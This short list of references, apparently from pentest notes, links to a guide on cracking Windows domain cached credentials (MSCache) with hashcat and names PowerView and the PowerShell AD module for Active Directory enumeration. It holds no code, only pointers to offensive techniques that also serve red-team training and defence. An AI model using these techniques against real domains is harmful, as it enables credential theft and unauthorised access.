  • How to crack Domain cached credentials (DCC): https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials#cracking-mscash-mscache-with-hashcat
  • Powerview: powerview
  • Powershell CMDLET: using-ad-module